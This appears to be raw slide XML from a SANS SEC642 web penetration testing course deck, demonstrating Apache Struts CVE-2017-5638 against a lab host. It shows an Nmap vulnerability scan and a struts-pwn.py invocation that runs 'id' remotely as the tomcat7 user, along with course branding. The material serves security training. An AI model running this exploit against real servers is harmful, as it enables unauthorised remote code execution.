                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>upload.action</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>struts.sec642.org</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-285750"/>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-285750"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Starting Nmap 6.46 ( http://nmap.org ) at 2017-12-09 18:52 EST</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-285750"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Nmap scan report for struts.sec642.org (10.42.6.27)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-285750"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Host is up (0.00028s latency).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-285750"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>PORT     STATE SERVICE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-285750"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>8080/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> open  http-proxy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-285750"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>| http-vuln-cve2017-5638: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-285750"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>|   VULNERABLE:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-285750"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>|   Apache Struts Remote Code Execution Vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-285750"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>|     State: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>VULNERABLE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-285750"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>|     IDs:  CVE:CVE-2017-5638</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-285750"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&lt;&lt;snip&gt;&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-285750"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>MAC Address: 00:16:3E:EB:D1:86 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Xensource</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-285750"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Nmap done: 1 IP address (1 host up) scanned in 0.23 seconds</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-285750"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4815BBEC-36BC-4751-A379-2649FA4D6A08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="4800600"/>
            <a:ext cx="3124200" cy="68580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929473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cap="none" dirty="0"/>
              <a:t>./strut-spwn.py with the correct URL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	./struts-pwn.py  -u  http://struts.sec642.org:8080/showcase/fileupload/upload.action</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Success! It ran the 'id' command and we see the response</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FBFFBBC-1C08-456A-BDE5-CB55858E298D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="464288" y="3124200"/>
            <a:ext cx="11277600" cy="2954655"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2F2F2"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="182880" tIns="91440" rIns="182880" bIns="9144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indent="-285750"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$ ./struts-pwn.py -u http://struts.sec642.org:8080/showcase/fileupload/upload.action</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-285750"/>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-285750"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[*] URL: http://struts.sec642.org:8080/showcase/fileupload/upload.action</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-285750"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[*] CMD: id</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-285750"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>=103(tomcat7) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>=108(tomcat7) groups=108(tomcat7)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-285750"/>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-285750"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[%] Done.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-285750"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF89FEF4-F4DE-49DF-911A-54CE8EDE803E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="4724400"/>
            <a:ext cx="7543800" cy="38100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13920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291EC-29B8-4194-9709-17BF502E13E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>SEC 642</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD5193A5-2820-47B9-9E05-F4B40590062A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Demo!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61207355-1937-43BB-9F57-6470C61A7720}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>No goats were sacrificed in the making of this demo!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95DC5826-E0D2-4492-B504-C38B64E8D89A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3012599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lide_SEC642_Melbourne-2018.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74CF4BD3-5A33-422D-9B03-D8D6C3386807}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7315200" y="4876800"/>
            <a:ext cx="4648200" cy="2092881"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>SANSFIRE 2018</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>Washington, DC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>SEC642</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>Mon, July 16 - Sat, July 21, 2018</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8719846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type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2017 was very bad </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>year for Struts 2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7625061C-B4D3-44CA-824C-267A9872876B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>At least </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" strike="sngStrike" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" baseline="30000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> remote code execution vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04DA7233-879D-45C2-A32D-508E061E190E}"/>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886617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F741005-520E-423F-82D1-8D658155E4D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It has been a bad few years for Java</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD34FF97-05D2-442F-875F-A49C132D0121}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8201324-F11C-45ED-AF92-5C90C02CF657}"/>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0029032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9BC53-57C9-461C-98A4-46B39E50D13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B64835A-B797-4998-9213-14F29A1CE408}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="7721599" cy="4343400"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9CCCE78-B25E-4AC5-9641-CC0F5D94E34A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8458200" y="152400"/>
            <a:ext cx="3200400" cy="3200400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="9" name="Table 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15A4EFD0-AAE7-4127-BF26-898C5CADAE61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="304800" y="4998720"/>
          <a:ext cx="10880724" cy="1737360"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5440362">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4276552900"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="5440362">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2825009842"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="1021080">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>SEC460: Enterprise Threat and Vulnerability Assessment</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0"/>
                        <a:t> </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Use our hashtag #SEC460 or follow us on Twitter @sanssec460</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT>
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB>
                      <a:noFill/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT>
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB>
                      <a:noFill/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2227919276"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45F96F52-BE96-49C0-94DD-BE64FD1AE25D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5534025" y="3429000"/>
            <a:ext cx="5428398" cy="3307080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
